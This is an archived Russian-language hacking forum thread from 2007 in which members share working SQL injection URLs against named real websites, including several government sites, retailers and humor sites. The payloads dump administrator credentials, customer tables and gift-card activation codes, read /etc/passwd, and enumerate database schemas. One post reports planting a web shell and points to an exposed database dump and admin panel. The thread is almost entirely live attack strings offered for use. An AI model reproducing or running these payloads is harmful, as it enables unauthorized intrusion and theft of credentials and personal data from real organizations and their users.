ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.10.2007, 18:35
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
делать было нечего :\
_://www.vlad.myths.ru/songs.php?song=-1903%20union%20select%201,2,3,concat(name,char(10) ,password),5,6,7,8,9,0,1,2,3%20from%20users/*
<title>...</title>
|
|
|
09.10.2007, 10:05
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
Для некоторых будет интересная база))))
Компания одна из групнейших поставщиков ПК техники на Украине
База одна для всех сайтов:
http://www._gb_.ua/
http://www._compass_.com.ua/
http://www._hi-fi_.com.ua/
http://www._delfics_.com/
скл есть почти на всех перечисленных сайтах
http://www._delfics_.com/Del_buy.asp?City_id=1+or+1=(SELECT+TOP+1+TABLE_NAM E+FROM+INFORMATION_SCHEMA.TABLES)--
интересные таблицы
ShopOrders
ManagerShopPollOtherSources
Articles
Cards
CardsToCustomers
ForumForums
ManagerShopLogins
MHShops
RacingBingo
RacingCards
ShopCustomers
http://www._delfics_.com/Del_buy.asp?City_id=1+or+1=(SELECT+TOP+1+column_NA ME+ FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_NAME= 'ShopCustomers'+an+column_name+not+in+('Customer_I d','Login','Password','First_Name' ,'Last_Name','Middle_Name','Email','Phone','Fax',' Region_id','City_id','Address','Zip','CustomerStat us_Id', 'Company_name','Company_address','Company_zkpo','C ompany_inn','Company_svid','Company_nds','Subscrib e1','Subscribe2','ForumDisplayEmail','Add_Date','M odification_Date','Site'))--
http://www._gb_.ua/shop/manager.asp?id=9991+uNioN+SeleCt+Card_Id,Balance,A ctivationCode,IsActivated+from+Cards--
http://www._gb_.ua/shop/manager.asp?id=9991+uNioN+SeleCt+id,login,password ,ShopName+from+ManagerShopLogins+where+id+not+in(' 1')--
пароли как то форума так и от входа не шифрованы
|
|
|
|
09.10.2007, 14:24
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
Сообщение от FFFFx029A
Народ, хелп, у когонить случайно незавалялся скрипт или доступ к хакнутому "агенству недвижимости"?
П.С очень нужно, ща вот сам через гуглю ищу дырявые "агенства недвижимости", если найду - выложу)
(Если кто жадный - могу поменять на скрипт инет магазина который я делал сам вручную снуля, вот пример: http://else.com.ua)
-----------------------------------------------------------------------
Вот нашол и залил шелл: http://www.multydom.crimea.ua/error.php
но эт некатит, ибо сделано кривыми руками и больше 20 баксов мне за него недадут...
-----------------------------------------------------------------------
Если кому несложно, выручите меня, буду всегда рад помоч...
P.S нужно чото типа этого агенства недвижимости: http://www.arcoreal.com.ua
(чтоб был поиск по хатам)
http://www.arcoreal.com.ua/private/sql/
по этому адрессу лежит файт dump.sql
там два хеша. попробуй расшифровать.
админка тут http://www.arcoreal.com.ua/admin
|
|
|
|
09.10.2007, 14:33
|
|
Постоянный
Регистрация: 25.05.2007
Сообщений: 448
Провел на форуме:
4226446
Репутация:
1564
|
|
Классный вывод)
Код:
http://www.bog.gov.gh/displayimage.php?displaytype=Thumbnails&albumid=-8+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,convert(table_name%20using%20utf8),9,0,1,2,3%20from+information_schema.tables/*&SOffset=0
А вот, собственно
Код:
http://www.bog.gov.gh/displayimage.php?displaytype=Thumbnails&albumid=-8+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,convert(concat(AdminName,0x3a,PassKey)%20using%20utf8),9,0,1,2,3+from+bog_tbladministrator/*&SOffset=0
Ну и еще
user - rad@localhost
version - 4.1.11
Код:
http://www.rad.gov.tw/prg/e_disscuss_content.php?id=-21663%20union%20select%201,2,convert(concat(database(),0x3a,user())%20using%20latin1),4,convert(version()%20using%20latin1),6,7,8,9,10,11/*
corporin_impacto@localhost
4.1.22-standard
Код:
http://www.corporinoquia.gov.co/2170/preguntas2.php?proceso=-9%20union%20select%201,user(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/*
4.1.8-nt
Код:
http://www.ttjfng.gov.tw/info_detial.php?InfoID=-88%20union%20select%201,2,3,4,5,version()/*
|
|
|
|
09.10.2007, 14:51
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
немного юмора
Код:
http://www.humor.fo/link/pass2.php?id=-1'/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database( )),5,6,7,8,9,10,11,12,13/*
runilo_mamb1@localhost:4.1.22-standard:runilo_mamb1
Код:
http://www.humor.fo/link/pass2.php?id=-1'/**/union/**/select/**/1,2,3,concat(memberName,0x3a,passwd,0x3a,passwordSalt,0x3a,emailAddress,0x3a,ICQ,0x3a,websiteUrl,0x3a,secretQuestion,0x3a,secretAnswer,0x3a,hideEmail,0x3a,location,0x3a,posts),5,6,7, 8,9,10,11,12,13/**/from/**/smf_members/*
Код:
http://www.humor.co.il/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,ver sion(),0x3a,database()),10,11,12,13,14,15/*
anakonda_HumorGo@localhost:4.1.22-standard:anakonda_humor2
Код:
http://www.humor.co.il/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(username,0x3a,password,0x3a, email),10,11,12,13,14,15+from+users/*
Код:
http://www.flighthumor.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0 x3a,database()),10,11,12,13,14,15/*
fh_fh@localhost:4.0.27-standard-log:fh_flighthumor |
|
|
|
09.10.2007, 15:36
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
*www.gateway.uz
TABLE_NAME : COLUMN_NAME
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,concat(table_name,0x3a,c olumn_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26+from+information_schema.colum ns/*
_________________
SHCEMA.TABLES:SITE_USERS
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,table_schema,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+fr om+information_schema.tables+where+table_name=char (0x73,0x69,0x74,0x65,0x5f,0x75,0x73,0x65,0x72,0x73 )/*
_________________
SHCEMA.TABLES:ICM_USERS
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,table_schema,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+fr om+information_schema.columns+where+table_name=cha r(0x69,0x63,0x6d,0x5f,0x75,0x73,0x65,0x72,0x73)/*
_________________
SHCEMA.TABLES:TRUSTED_USERS
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,table_schema,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+fr om+information_schema.columns+where+table_name=cha r(0x74,0x72,0x75,0x73,0x74,0x65,0x64,0x5f,0x75,0x7 3,0x65,0x72,0x73)/*
_________________
SHCEMA.TABLES:USERS
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,table_schema,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+fr om+information_schema.columns+where+table_name=cha r(0x75,0x73,0x65,0x72,0x73)/*
_________________
вывод:igca.site_users
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,concat_ws(0x3a,id,Name,P os,Org,NickName,Password),6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26+from+igca.site_ users/*
вывод:cen.site_users
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,concat_ws(0x3a,id,Name,P os,Org,NickName,Password),6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26+from+cen.site_u sers/*
вывод:cagateway.site_users
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,concat_ws(0x3a,id,Name,P os,Org,NickName,Password),6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26+from+cagateway. site_users/*
вывод:igca.trusted_users
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,concat_ws(0x3a,Id,Login, Password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26+from+igca.trusted_users/*
вывод:rstate.users
http://www.gateway.uz/calendar.php?lng=2&Id=-3508+union+select+1,2,3,4,concat_ws(0x3a,id,userty pe,username,pass),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26+from+rstate.users/*
|
|
|
|
09.10.2007, 15:45
|
|
Познающий
Регистрация: 28.09.2007
Сообщений: 56
Провел на форуме:
4328058
Репутация:
86
|
|
Код:
http://geolog.mnr.gov.ru/part/?pid=-1/**/union/**/select/**/1,concat(user(),0x3a,version(),0x3a,database()),3/*
|
|
|
|
09.10.2007, 15:52
|
|
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441
Репутация:
161
|
|
http://geolog.mnr.gov.ru/part/?pid=-1+union+select+1,LOAD_FILE('/etc/passwd'),3/*
Так намного красивей)
|
|
|
|
09.10.2007, 17:21
|
|
Постоянный
Регистрация: 25.05.2007
Сообщений: 448
Провел на форуме:
4226446
Репутация:
1564
|
|
Код:
http://www.grbipunjab.gov.pk/menu_contents.php?MAINID=11&SUBID=-9%20union%20select%201,version(),3,user()/*
4.1.7
Код:
http://www.nlm.gov.mv/main/latestbookdetails.php?bookdetails=-7%20union%20select%201,2,convert(database()%20using%20latin1),4,5,6,7,8,convert%20(version()%20using%20latin1),0/*
4.0.13-nt - 6
Код:
http://menweb.mineducacion.gov.co:8080/saber/casos_i.php?Institucion1=-9%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
4.0.17-log
Код:
http://www.semar.pi.gov.br/noticias.php?codigo=-582+union+select%201,2,3,4,VERSION(),6,7,8,9,0/*
4.1.22-standard
Код:
http://www.ecs.gov.bd/electoral.php3?t=-5+union+select+1,version(),3/*?ifs=-9
4.0.26-nt-log
Код:
http://www.camarapalmares.pe.gov.br/requerimentos.php?r=-8%20union%20select%201,2,3,4,version(),6,7/*
4.1.12-standard-log
Код:
http://www.bombeiros.mt.gov.br/site/conteudoUnidade.php?unidade=0&id=-7%20union%20select%201,2,convert(version()%20using%20latin1),4,5,6,7/*&PHPSESSID=b5d7181c5cb7ba97ed178c7b4ccd94f9
4.0.27-standard-log
Код:
http://www.zt-rada.gov.ua/ukrainian/turbotapage.php?page_id=7&turb_pidrozdil_id=-9%20union%20select%201,version(),3/*
В продолжение
Код:
http://www.zt-rada.gov.ua/ukrainian/turbotapage.php?page_id=7&turb_pidrozdil_id=-9%20union%20select%201,concat(user_name,0x3a,user_password),3%20from%20users/*
|
|
|
|
09.10.2007, 20:55
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
для "любителей" Дома-2:
Код:
http://romaolya.ru/videogal/?cat=-4+UNION+SELECT+1,2,user(),4,5,6/*
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
|
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|
Похожие темы
Линейный вид
